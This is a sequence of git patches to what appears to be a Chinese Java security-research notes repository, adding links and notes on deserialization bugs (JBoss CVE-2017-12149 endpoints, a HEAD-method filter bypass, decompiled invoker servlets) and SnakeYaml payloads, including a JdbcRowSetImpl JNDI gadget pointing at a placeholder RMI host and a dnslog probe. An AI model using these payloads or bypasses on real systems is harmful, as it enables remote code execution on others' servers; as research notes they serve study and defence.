**使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25) + 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。 + 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485) + 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md) From e4ce9bdc0217e92f8c14105f3ee8066c2fdb121b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Jul 2022 16:11:38 +0800 Subject: [PATCH 090/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8c200b..b82a05e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -144,3 +144,4 @@ + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** ++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) From 521cf5dd53eeeca310a7ab8f239a25d9e0433991 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 3 Jul 2022 20:21:01 +0800 Subject: [PATCH 091/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b82a05e..415bb41 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -145,3 +145,4 @@ + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) ++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** From 5658e488a7fe1486912002ab287817ee32e70eca Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:24:24 +0800 Subject: [PATCH 092/332] Update README.md --- Jboss/README.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 029922c..840d1a5 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -1,4 +1,4 @@ -## jboss介绍: +# jboss介绍: JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 @@ -6,3 +6,14 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 所以自己想写一个综合利用的工具。。。 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) + +## CVE-2017-12149 + +**endpoint** +``` +/invoker/readonly +/invoker/EJBInvokerServlet +/invoker/JMXInvokerServlet +/invoker/readonly/JMXInvokerServlet +/invoker/restricted/JMXInvokerServlet +``` From 5c7898aae22bcfeae2dd48ce1b62f57808317143 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:14 +0800 Subject: [PATCH 093/332] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 840d1a5..05bb751 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -8,7 +8,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) ## CVE-2017-12149 - +bypass 请求方式是HEAD **endpoint** ``` /invoker/readonly From 9bedef620fa3a13cf65efd526a50fcdfd6030dbf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:28 +0800 Subject: [PATCH 094/332] Update README.md --- Jboss/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Jboss/README.md b/Jboss/README.md index 05bb751..10fa4ff 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -9,6 +9,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 ## CVE-2017-12149 bypass 请求方式是HEAD + **endpoint** ``` /invoker/readonly From 90e4dc33aec17ad352ad094d770eb7d92803452c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:59:33 +0800 Subject: [PATCH 095/332] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 10fa4ff..aa2b85d 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -12,7 +12,7 @@ bypass 请求方式是HEAD **endpoint** ``` -/invoker/readonly +/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的 /invoker/EJBInvokerServlet /invoker/JMXInvokerServlet /invoker/readonly/JMXInvokerServlet From 566fae7b414b0391b9c6ab5e6ca3ecc0eedc3549 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 14:03:06 +0800 Subject: [PATCH 096/332] Update README.md --- Jboss/README.md | 490 +++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 489 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index aa2b85d..6e56210 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -7,7 +7,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) -## CVE-2017-12149 +## 反序列化漏洞 bypass 请求方式是HEAD **endpoint** @@ -18,3 +18,491 @@ bypass 请求方式是HEAD /invoker/readonly/JMXInvokerServlet /invoker/restricted/JMXInvokerServlet ``` +http-invoker.sar 组件的问题 + +web.xml + +```xml + + + + + + + ReadOnlyAccessFilter + org.jboss.invocation.http.servlet.ReadOnlyAccessFilter + + readOnlyContext + readonly + The top level JNDI context the filter will enforce + read-only access on. If specified only Context.lookup operations + will be allowed on this context. Another other operations or lookups + on any other context will fail. Do not associate this filter with the + JMXInvokerServlets if you want unrestricted access. + + + + invokerName + jboss:service=NamingBeanImpl + The JMX ObjectName of the naming service mbean + + + + + + ReadOnlyAccessFilter + /readonly/* + + + + + EJBInvokerServlet + The EJBInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the EJB invoker given by + the invokerName init-param. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + + invokerName + jboss:service=invoker,type=http + The RMI/HTTP EJB compatible invoker + + 1 + + + JMXInvokerServlet + The JMXInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the invoker given by + the the MBean whose object name hash is specified by the + invocation.getObjectName() value. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + 1 + + + + JNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http. The return content is a serialized + MarshalledValue containg the org.jnp.interfaces.Naming stub. This + configuration handles requests for the standard JNDI naming service. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming + + + proxyAttribute + Proxy + + 2 + + + + ReadOnlyJNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http, but only for a single read-only context. The return content + is a serialized MarshalledValue containg the org.jnp.interfaces.Naming + stub. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming,readonly=true + + + proxyAttribute + Proxy + + 2 + + + + + JNDIFactory + /JNDIFactory/* + + + + ReadOnlyJNDIFactory + /ReadOnlyJNDIFactory/* + + + EJBInvokerServlet + /EJBInvokerServlet/* + + + JMXInvokerServlet + /JMXInvokerServlet/* + + + + JMXInvokerServlet + /readonly/JMXInvokerServlet/* + + + + + JNDIFactory + /restricted/JNDIFactory/* + + + JMXInvokerServlet + /restricted/JMXInvokerServlet/* + + + + + + HttpInvokers + An example security config that only allows users with the + role HttpInvoker to access the HTTP invoker servlets + + /restricted/* + GET + POST + + + HttpInvoker + + + + BASIC + JBoss HTTP Invoker + + + + HttpInvoker + + +``` +org.jboss.invocation.http.servlet.ReadOnlyAccessFilter +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.lang.reflect.Method; +import java.security.Principal; +import java.util.Map; +import javax.management.MBeanServer; +import javax.management.ObjectName; +import javax.servlet.Filter; +import javax.servlet.FilterChain; +import javax.servlet.FilterConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.logging.Logger; +import org.jboss.mx.util.MBeanServerLocator; + +public class ReadOnlyAccessFilter implements Filter { + private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class); + private FilterConfig filterConfig = null; + private String readOnlyContext; + private Map namingMethodMap; + + public ReadOnlyAccessFilter() { + } + + public void init(FilterConfig filterConfig) throws ServletException { + this.filterConfig = filterConfig; + if (filterConfig != null) { + this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext"); + String invokerName = filterConfig.getInitParameter("invokerName"); + + try { + MBeanServer mbeanServer = MBeanServerLocator.locateJBoss(); + ObjectName mbean = new ObjectName(invokerName); + this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap"); + } catch (Exception var5) { + log.error("Failed to init ReadOnlyAccessFilter", var5); + throw new ServletException("Failed to init ReadOnlyAccessFilter", var5); + } + } + + } + + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { + HttpServletRequest httpRequest = (HttpServletRequest)request; + Principal user = httpRequest.getUserPrincipal(); + if (user == null && this.readOnlyContext != null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + MarshalledInvocation mi = null; + + try { + mi = (MarshalledInvocation)ois.readObject(); + } catch (ClassNotFoundException var10) { + throw new ServletException("Failed to read MarshalledInvocation", var10); + } + + request.setAttribute("MarshalledInvocation", mi); + mi.setMethodMap(this.namingMethodMap); + Method m = mi.getMethod(); + if (m != null) { + this.validateAccess(m, mi); + } + } + + chain.doFilter(request, response); + } + + public void destroy() { + } + + public String toString() { + if (this.filterConfig == null) { + return "NamingAccessFilter()"; + } else { + StringBuffer sb = new StringBuffer("NamingAccessFilter("); + sb.append(this.filterConfig); + sb.append(")"); + return sb.toString(); + } + } + + private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("Checking against readOnlyContext: " + this.readOnlyContext); + } + + String methodName = m.getName(); + if (!methodName.equals("lookup")) { + throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed"); + } else { + Object[] args = mi.getArguments(); + Object arg = args.length > 0 ? args[0] : ""; + String name; + if (arg instanceof String) { + name = (String)arg; + } else { + name = arg.toString(); + } + + if (trace) { + log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext); + } + + if (!name.startsWith(this.readOnlyContext)) { + throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext); + } + } + } +} +``` +org.jboss.invocation.http.servlet.InvokerServlet +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationTargetException; +import java.security.AccessController; +import java.security.Principal; +import java.security.PrivilegedAction; +import javax.management.MBeanServer; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import javax.servlet.ServletConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletOutputStream; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.jboss.invocation.InvocationException; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.invocation.MarshalledValue; +import org.jboss.logging.Logger; +import org.jboss.mx.util.JMXExceptionDecoder; +import org.jboss.mx.util.MBeanServerLocator; +import org.jboss.security.SecurityAssociation; +import org.jboss.system.Registry; + +public class InvokerServlet extends HttpServlet { + private static Logger log = Logger.getLogger(InvokerServlet.class); + private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"; + private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"; + private MBeanServer mbeanServer; + private ObjectName localInvokerName; + + public InvokerServlet() { + } + + public void init(ServletConfig config) throws ServletException { + super.init(config); + + try { + String name = config.getInitParameter("invokerName"); + if (name != null) { + this.localInvokerName = new ObjectName(name); + log.debug("localInvokerName=" + this.localInvokerName); + } + } catch (MalformedObjectNameException var3) { + throw new ServletException("Failed to build invokerName", var3); + } + + this.mbeanServer = MBeanServerLocator.locateJBoss(); + if (this.mbeanServer == null) { + throw new ServletException("Failed to locate the MBeanServer"); + } + } + + public void destroy() { + } + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("processRequest, ContentLength: " + request.getContentLength()); + log.trace("processRequest, ContentType: " + request.getContentType()); + } + + Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute"); + + try { + response.setContentType(RESPONSE_CONTENT_TYPE); + MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation"); + if (mi == null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + mi = (MarshalledInvocation)ois.readObject(); + ois.close(); + } + + if (mi.getPrincipal() == null && mi.getCredential() == null) { + mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal()); + mi.setCredential(InvokerServlet.GetCredentialAction.getCredential()); + } + + Object[] params = new Object[]{mi}; + String[] sig = new String[]{"org.jboss.invocation.Invocation"}; + ObjectName invokerName = this.localInvokerName; + if (invokerName == null) { + Integer nameHash = (Integer)mi.getObjectName(); + invokerName = (ObjectName)Registry.lookup(nameHash); + if (invokerName == null) { + throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")"); + } + } + + Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + request.setAttribute("returnValue", value); + } else { + MarshalledValue mv = new MarshalledValue(value); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } catch (Throwable var13) { + Throwable t = JMXExceptionDecoder.decode(var13); + if (t instanceof InvocationTargetException) { + InvocationTargetException ite = (InvocationTargetException)t; + t = ite.getTargetException(); + } + + InvocationException appException = new InvocationException(t); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + log.debug("Invoke threw exception", t); + request.setAttribute("returnValue", appException); + } else if (response.isCommitted()) { + log.error("Invoke threw exception, and response is already committed", t); + } else { + response.resetBuffer(); + MarshalledValue mv = new MarshalledValue(appException); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } + + } + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + public String getServletInfo() { + return "An HTTP to JMX invocation servlet"; + } + + private static class GetCredentialAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction(); + + private GetCredentialAction() { + } + + public Object run() { + Object credential = SecurityAssociation.getCredential(); + return credential; + } + + static Object getCredential() { + Object credential = AccessController.doPrivileged(ACTION); + return credential; + } + } + + private static class GetPrincipalAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction(); + + private GetPrincipalAction() { + } + + public Object run() { + Principal principal = SecurityAssociation.getPrincipal(); + return principal; + } + + static Principal getPrincipal() { + Principal principal = (Principal)AccessController.doPrivileged(ACTION); + return principal; + } + } +} +``` From dd1fe2e2aba2fdfc7696cab2bea729323bdca28d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 13:49:49 +0800 Subject: [PATCH 097/332] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 3a3feb9..678fd9a 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,4 +1,5 @@ # 真实例子 Confluence CVE-2019-3396 +Jira CVE-2019-11581 From 284f248d9b86e59849cc61c4da798896b4f94d8d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 14:03:42 +0800 Subject: [PATCH 098/332] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 678fd9a..f6c05c2 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,5 +1,6 @@ # 真实例子 Confluence CVE-2019-3396 + Jira CVE-2019-11581 From e9ada9eb1e24bd231112b09ac1b07002d373c587 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 12:52:41 +0800 Subject: [PATCH 099/332] Update Readme.md --- SnakeYaml/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index cf6bec6..e699ddd 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -8,6 +8,8 @@ https://xz.aliyun.com/t/10655 +限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ + 加载本地 ```java String data2 = "!!javax.script.ScriptEngineManager [\n" + From 167818cf08b5cf2b3a5e63a6d0019d18fa99e5e1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:17:26 +0800 Subject: [PATCH 100/332] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index e699ddd..89be881 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -23,3 +23,9 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ```java String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]"; ``` + +## 其他链 一般是jndi + +``` +!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} +``` From 6f60ab9cd377302f64b3b0edc8108b4437ece805 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:20:48 +0800 Subject: [PATCH 101/332] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index 89be881..b14e92b 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -3,12 +3,12 @@ ## 不出网利用 >通过写文件然后本地加载rce -//todo 写一个工具 去完成 +//todo 写一个工具 去完成 已经完成了 https://xz.aliyun.com/t/10655 -限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ +限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ 加载本地 ```java @@ -29,3 +29,5 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ``` !!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} ``` + +参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E From ef6fb63bae480bb06898555d39d777b1cc2ce472 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 14:19:49 +0800 Subject: [PATCH 102/332] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 24f8a89..56f6390 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -1,5 +1,7 @@ # EL +https://xz.aliyun.com/t/7692 + ## 回显 https://forum.butian.net/share/886 From 8dead4aea8192692eadb399e15f38b3695a8acbe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 18 Jul 2022 21:53:16 +0800 Subject: [PATCH 103/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 415bb41..54e1208 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -146,3 +146,4 @@ + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** ++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) From fd140a0a0a4cd4c9f4807283ae56ef151b4b9cc4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 15 Aug 2022 23:31:07 +0800 Subject: [PATCH 104/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54e1208..8945633 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -147,3 +147,4 @@ + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) ++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** From faa7c2e1ecca0d6c88ffc8ae5e3fb05b847274ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 16 Aug 2022 13:05:33 +0800 Subject: [PATCH 105/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8945633..3684b0a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -148,3 +148,4 @@ + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** ++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** From 1167c93eaf24f3a624f3de3351f974627ec9a080 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 20 Aug 2022 00:16:26 +0800 Subject: [PATCH 106/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3684b0a..675c06c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ 